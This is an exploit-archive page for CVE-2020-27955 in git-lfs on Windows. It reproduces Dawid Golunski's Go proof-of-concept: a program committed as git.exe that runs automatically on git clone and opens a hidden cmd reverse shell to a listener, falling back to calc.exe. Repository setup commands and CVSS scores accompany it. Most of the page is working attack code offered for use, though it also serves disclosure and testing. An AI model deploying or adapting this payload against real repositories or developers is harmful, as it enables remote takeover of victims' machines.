git-lfs Remote Code Execution Exploit

🗓️ 08 Nov 2020 00:00:00Reported by Dawid GolunskiType

zdt🔗 0day.today👁 44 Views

Git-lfs RCE exploit for Windows dev world using git. Automatically executes a payload on git clone operation, spawning a reverse shell or calc.exe for testing. Requires an lfs-enabled repository with lfs files.

Reporter	Title	Published	Views	Family All 50
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	25 May 202115:26	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	4 Nov 202016:43	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	30 Apr 202114:25	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	30 Apr 202109:38	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	13 May 202110:30	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	24 Nov 202002:40	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	2 Aug 202112:32	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	3 Nov 202017:14	–	githubexploit
0day.today	Git git-lfs Remote Code Execution Exploit	17 Sep 202100:00	–	zdt
AlpineLinux	CVE-2020-27955	5 Nov 202014:57	–	alpinelinux

/*
   Go PoC exploit for git-lfs -  Remote Code Execution (RCE)
vulnerability CVE-2020-27955
   git-lfs-RCE-exploit-CVE-2020-27955.go

   Discovered by Dawid Golunski
   https://legalhackers.com
   https://exploitbox.io


   Affected (RCE exploit):
   Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken /
SmartGit / SourceTree etc.
   Basically the whole Windows dev world which uses git.

   Usage:
   Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go
   Save & commit as git.exe

   The payload should get executed automatically on git clone operation.
   It spawns a reverse shell, or a calc.exe for testing (if it
couldn't connect).

   An lfs-enabled repository with lfs files may also be needed so that git-lfs
gets invoked. This can be achieved with:

   git lfs track "*.dat"
   echo "fat bug file" > lfsdata.dat
   git add .*
   git add *
   git commmit -m 'git-lfs exploit' -a

   Check out the full advisory for details:

   https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html

   https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html

   PoC video at:
   https://youtu.be/tlptOf9w274

 ** For testing purposes only **


*/

package main
import (
    "net"
    "os/exec"
    "bufio"
    "syscall"
)


func revsh(host string) {

    c, err := net.Dial("tcp", host)
    if nil != err {
    // Conn failed
        if nil != c {
            c.Close()
        }
        // Calc for testing purposes if no listener available
        cmd := exec.Command("calc")
        cmd.Run()
        return
    }

    r := bufio.NewReader(c)
    for {
        runcmd, err := r.ReadString('\n')
        if nil != err {
            c.Close()
            return
        }
        cmd := exec.Command("cmd", "/C", runcmd)
        cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
        out, _ := cmd.CombinedOutput()
        c.Write(out)
    }
}

// Connect to netcat listener on local port 1337
func main() {
    revsh("localhost:1337")
}


-- 
Regards,
Dawid Golunski

08 Nov 2020 00:00Current

0.4Low risk

Vulners AI Score0.4

CVSS 3.19.8

CVSS 210

EPSS0.92929